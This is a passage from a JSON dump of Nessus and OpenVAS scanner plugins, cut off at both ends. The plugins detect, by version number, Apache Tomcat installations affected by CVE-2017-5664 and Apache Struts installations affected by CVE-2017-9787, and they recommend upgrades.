Tomcat 7.0.x < 7.0.78 / 8.0.x < 8.0.44 / 8.5.x < 8.5.15 / 9.0.x < 9.0.0.M21 Remote Error Page Manipulation", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100681);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2020/01/16\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_bugtraq_id(98888);\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.78 / 8.0.x < 8.0.44 / 8.5.x < 8.5.15 / 9.0.x < 9.0.0.M21 Remote Error Page Manipulation\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a remote error page\nmanipulation vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Apache Tomcat\nservice running on the remote host is 7.0.x prior to 7.0.78, 8.0.x\nprior to 8.0.44, 8.5.x prior to 8.5.15, or 9.0.x prior to 9.0.0.M21.\nIt is, therefore, affected by an implementation flaw in the error \npage reporting mechanism in which it does not conform to the Java \nServlet Specification that requires static error pages to be processed \nas an HTTP GET request nothwithstanding the HTTP request method that \nwas originally used when the error occurred. Depending on the original \nrequest and the configuration of the Default Servlet, an \nunauthenticated, remote attacker can exploit this issue to replace or \nremove custom error pages.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.78\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.44\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.15\");\n # https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M21\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a774a43b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.78 / 8.0.44 / 8.5.15 / 9.0.0.M21 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5664\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\", \"Settings/ParanoidReport\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\ntomcat_check_version(fixed:make_list(\"7.0.78\", \"8.0.44\", \"8.5.15\", \"9.0.0.M21\"), severity:SECURITY_WARNING, granularity_regex:\"^(7(\\.0)?|8(\\.(0|5))?|9(\\.0)?)$\");\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T07:12:15", "bulletinFamily": "scanner", "description": "This update includes a rebase from 8.0.43 up to 8.0.44 which resolves\na single CVE along with various other bugs/features :\n\n - rhbz#1459160 CVE-2017-5664 tomcat: Security constrained\n bypass in error page mechanism\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-02-02T00:00:00", "id": "FEDORA_2017-63789C8C29.NASL", "href": "https://www.tenable.com/plugins/nessus/101123", "published": "2017-06-30T00:00:00", "title": "Fedora 25 : 1:tomcat (2017-63789c8c29)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-63789c8c29.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101123);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/24 14:09:07\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"FEDORA\", value:\"2017-63789c8c29\");\n\n script_name(english:\"Fedora 25 : 1:tomcat (2017-63789c8c29)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes a rebase from 8.0.43 up to 8.0.44 which resolves\na single CVE along with various other bugs/features :\n\n - rhbz#1459160 CVE-2017-5664 tomcat: Security constrained\n bypass in error page mechanism\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-63789c8c29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:tomcat package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"tomcat-8.0.44-1.fc25\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T06:42:12", "bulletinFamily": "scanner", "description": "Security constrained bypass in error page mechanism :\n\nA vulnerability was discovered in the error page mechanism in Tomcat", "modified": "2020-02-02T00:00:00", "id": "ALA_ALAS-2017-853.NASL", "href": "https://www.tenable.com/plugins/nessus/101270", "published": "2017-07-07T00:00:00", "title": "Amazon Linux AMI : tomcat7 (ALAS-2017-853)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-853.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101270);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"ALAS\", value:\"2017-853\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2017-853)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security constrained bypass in error page mechanism :\n\nA vulnerability was discovered in the error page mechanism in Tomcat's\nDefaultServlet implementation. A crafted HTTP request could cause\nundesired side effects, possibly including the removal or replacement\nof the custom error page. (CVE-2017-5664)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-853.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.78-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.78-1.27.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T06:52:23", "bulletinFamily": "scanner", "description": "The error page mechanism of the Java Servlet Specification requires\nthat, when an error occurs and an error page is configured for the\nerror that occurred, the original request and response are forwarded\nto the error page. This means that the request is presented to the\nerror page with the original HTTP method. If the error page is a\nstatic file, expected behaviour is to serve content of the file as if\nprocessing a GET request, regardless of the actual HTTP method. The\nDefault Servlet in Apache Tomcat did not do this. Depending on the\noriginal request this could lead to unexpected and undesirable results\nfor static error pages including, if the DefaultServlet is configured\nto permit writes, the replacement or removal of the custom error page.\n\nFor Debian 7 ", "modified": "2020-02-02T00:00:00", "id": "DEBIAN_DLA-996.NASL", "href": "https://www.tenable.com/plugins/nessus/100941", "published": "2017-06-21T00:00:00", "title": "Debian DLA-996-1 : tomcat7 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-996-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100941);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/07/10 12:45:04\");\n\n script_cve_id(\"CVE-2017-5664\");\n\n script_name(english:\"Debian DLA-996-1 : tomcat7 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The error page mechanism of the Java Servlet Specification requires\nthat, when an error occurs and an error page is configured for the\nerror that occurred, the original request and response are forwarded\nto the error page. This means that the request is presented to the\nerror page with the original HTTP method. If the error page is a\nstatic file, expected behaviour is to serve content of the file as if\nprocessing a GET request, regardless of the actual HTTP method. The\nDefault Servlet in Apache Tomcat did not do this. Depending on the\noriginal request this could lead to unexpected and undesirable results\nfor static error pages including, if the DefaultServlet is configured\nto permit writes, the replacement or removal of the custom error page.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.0.28-4+deb7u14.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00025.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tomcat7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtomcat7-java\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-admin\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-common\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-docs\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-examples\", reference:\"7.0.28-4+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tomcat7-user\", reference:\"7.0.28-4+deb7u14\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "scanner", "description": "When using a Spring AOP functionality to secure Struts actions it is\npossible to perform a DoS attack when user was properly authenticated", "modified": "2018-10-26T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310106957", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106957", "title": "Apache Struts Spring AOP DoS Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_spring_dos_vuln_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Apache Struts Spring AOP DoS Vulnerability (Windows)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106957\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 09:09:00 +0700 (Tue, 18 Jul 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2017-9787\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts Spring AOP DoS Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"When using a Spring AOP functionality to secure Struts actions it is\npossible to perform a DoS attack when user was properly authenticated\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.7 - Struts 2.3.32, Struts 2.5 - Struts 2.5.10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.33, 2.5.12 or later.\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-049.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.3.7\", test_version2: \"2.3.32\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.3.33\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.5\", test_version2: \"2.5.10.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.5.12\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "scanner", "description": "When using a Spring AOP functionality to secure Struts actions it is\npossible to perform a DoS attack when user was properly authenticated", "modified": "2018-10-26T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310106956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106956", "title": "Apache Struts Spring AOP DoS Vulnerability (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_spring_dos_vuln_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Apache Struts Spring AOP DoS Vulnerability (Linux)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106956\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 09:09:00 +0700 (Tue, 18 Jul 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2017-9787\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts Spring AOP DoS Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"When using a Spring AOP functionality to secure Struts actions it is\npossible to perform a DoS attack when user was properly authenticated\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.7 - Struts 2.3.32, Struts 2.5 - Struts 2.5.10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.33, 2.5.12 or later.\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-049.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.3.7\", test_version2: \"2.3.32\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.3.33\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.5\", test_version2: \"2.5.10.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.5.12\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-13T20:12:11", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to remote code execution vulnerability.", "modified": "2019-11-12T00:00:00", "published": "2017-09-07T00:00:00", "id": "OPENVAS:1361412562310811730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811730", "title": "Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of 